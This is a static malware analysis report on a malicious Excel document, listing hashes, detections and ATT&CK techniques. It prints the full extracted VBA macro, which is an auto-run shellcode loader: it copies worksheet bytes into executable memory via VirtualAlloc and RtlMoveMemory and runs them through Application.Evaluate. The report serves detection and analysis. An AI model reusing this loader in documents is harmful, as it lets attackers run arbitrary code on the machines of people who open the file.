Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 b0e22954b3ec6d42…

MALICIOUS

Office (OOXML)

Size: 16.2 KB
Created: 2021-10-18 14:56:53 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-10-27
MD5: 542e140d3751807947f182fde86bd36b
SHA-1: aa217d9570d7885b3e68ef804250d33678eea142
SHA-256: b0e22954b3ec6d427ccd28aa83b209b6f2b0f1c3ce9ef30da3a30f15e57729b3
Risk score: 164

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The file is an Office document containing several VBA macros (AutoOpen, Workbook_Open and Auto_Open) that run code as soon as the document is opened. The VBA script reads a column of values from the worksheet, allocates a memory buffer and copies those bytes into it one at a time, then calls Application.Evaluate on a concatenated string (p1 to p5, which are not defined in the extracted code but most likely assemble a function name or command) with the buffer address as an argument, so that arbitrary code is executed. This is a common technique for downloading and executing further malicious payloads.

Heuristics (5)

  • ClamAV: Doc.Downloader.Generic-6698421-0 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA project inside OOXML (severity: medium, 3 related findings, rule: OOXML_VBA)
    Document contains a VBA project (VBA macros present)
  • AutoOpen macro (severity: low, rule: OLE_VBA_AUTOOPEN)
    Matched lines in script:
        End Sub
        Sub AutoOpen()
                Auto_Open
  • Workbook_Open macro (severity: low, rule: OLE_VBA_WBOPEN)
    Matched lines in script:
        End Sub
        Sub Workbook_Open()
                Auto_Open
  • Auto_Open macro (severity: low, rule: OLE_VBA_AUTO)
    Matched lines in script:
        Sub Auto_Open()
                Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long, i As Long, n As Long

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 1627 bytes
SHA-256: 8d470090d5efe93eff5e66ab68114cb601053d3b8e83f8a9724d45315d9e8dcc

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module1"


Function VBA_Evaluate(Input_String As String)
Application.Volatile
VBA_Evaluate = Application.Evaluate(Input_String)
End Function

Sub Auto_Open()
        Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long, i As Long, n As Long
#If VBA7 Then
        Dim Xlbufvetp As LongPtr
#Else
        Dim Xlbufvetp As Long
#End If
n = Range("A1", Range("A1").End(xlDown)).Rows.Count
   ReDim Hyeyhafxp(n)
   For i = 0 To n
      Hyeyhafxp(i) = Range("A1").Offset(i, 0)
   Next i
   

        Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)
        For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)
                Wyzayxya = Hyeyhafxp(Zolde)
                Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)
        Next Zolde

        VBA_Evaluate (p1 & p2 & p3 & p4 & p5 & "(0, 0, " & Xlbufvetp & ", 0, 0, 0)")
End Sub
Sub AutoOpen()
        Auto_Open
End Sub
Sub Workbook_Open()
        Auto_Open
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 19456 bytes
SHA-256: 96dae2fc1318a0f8a2092ecdafc04342178ae2a8e0e1507b9f0847f2df9f6808
Detection
ClamAV: Doc.Downloader.Generic-6698421-0
Obfuscation or payload: unlikely